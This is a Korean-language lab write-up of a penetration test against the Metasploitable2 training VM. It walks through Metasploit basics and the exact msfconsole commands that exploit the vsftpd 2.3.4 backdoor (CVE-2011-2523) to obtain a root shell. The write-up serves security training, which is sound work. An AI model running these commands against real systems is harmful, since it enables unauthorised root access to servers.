Mitre ATT&CK -Initial Access[FTP 취약점]

■ 개요

- 진단 항목에 맞게 어떤 취약점들이 도출될 수 있는지 확인 후 시나리오 기반으로 각 진단 항목을 대입하여 침투 가능 여부 확인

- 공격자는 정보수집(정찰) 과정을 통해 획득한 정보로 초기 진입(Initial Access)을 진행하는 사례로, 공급망 손상(Supply Chain Compromise)에 해당

- metasploit2를 대상으로 진행하였으며, 정보 수집 단계에서 확인된 사항을 토대로 점검 진행

- 모의 침투는 Kali Linux에서 제공하는 metasploit framework를 사용할 예정

 

■ 사전지식

□ metasploit(메타스플로잇) 정의

- CVE 넘버링이 붙은 알려진 취약점 공격을 사용할 수 있도록 제공되는 모의 해킹 도구

- 정보 수집, 공격(Exploit), 공격에 사용되는 Plugin(payload) 등으로 구성된 도구

- 정보 수집 및 공격 모듈 사용 시 간편하게 진행 가능

- Msfconsole 내에서 외부 명령어 사용 가능

 

□ metasploit(메타스플로잇) 용어 정리

- Exploit : 시스템, 애플리케이션, 서버 등의 취약점을 이용하여 공격 진행(Ex : SQL Injection)

- Post : exploit 이후 추가 공격에 사용되는 도구 또는 모듈

- Payload : 시스템에서 실행하고자 하는 코드로 프레임워크에 의해 전달(Ex : 악성코드)

- Shell code : 공격 수행할 때 payload에 사용되는 명령 집합

- Module : Metasploit framework에서 사용되는 소프트웨어의 부분

- auxiliary : 탐색에 사용되는 도구들

 

□ metasploit(메타스플로잇) 명령어

search

- CVE 넘버를 검색하거나 취약점 이름을 검색하는 명령어 - 보통 CVE, NAME, Platform, type 옵션을 많이 사용

use

- 원하는 모듈을 사용하는 명령어 - search를 통해 검색한 모듈을 use 명령어를 통해 사용

show options

- Exploit을 하기 위해 필요한 값을 확인 - Required ‘yes’로 설정된 값은 필수로 입력해야 하는 값으로 설정 필요

set

- show options에서 확인한 값 입력하는 명령어로 특정 변수의 값을 설정

exploit

- 선택한 모듈을 수행하기 위한 명령어

 

■ 진행 절차

Step 1. 정보수집 과정에서 FTP가 Open되어 있음을 확인하였으며, 버전은 vsftpd 2.3.4를 사용. 익명의 사용자(Anonymous)도 접근이 가능하여 해당 버전 또는 익명 사용자도 접근 가능한 취약한 설정을 토대로 침투가 가능한지 여부를 체크

[NMAP 조회 결과]

[anonymous로 ftp 접근 가능 확인]

[해당 ftp 버전 exploit 코드가 있는것으로 확인]

 

Step 2. metasploit 접근 후,  Exploit 진행 시 root 권한 쉘 획득 성공 확인

※ vsftpd 2.3.4 Backdoor Commnad Execution(CVE-2011-2523) : vsftpd에서 관리상 편의성으로 백도어를 설치한 것을 악용한 것으로 추측되고 있으며, ftp 포트로 특정 바이트 스퀀스를 전송하면 시스템 포트인 6200번 포트로 백도어가 동작하는 취약점

명령어

root@kali#msfconsole

msf6 >search vsftpd 2.3.4

msf6 >use exploit/unix/ftp/vsftpd_234_backdoor

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >show options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >set RHOSTS [대상 IP]

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[metasploit 실행 후 search 명령어를 통해 exploit 코드가 있는지 확인]

[공격 진행에 앞서 필요한 옵션 값 설정]

[공격 진행 시 루트 쉘 권한 획득 확인]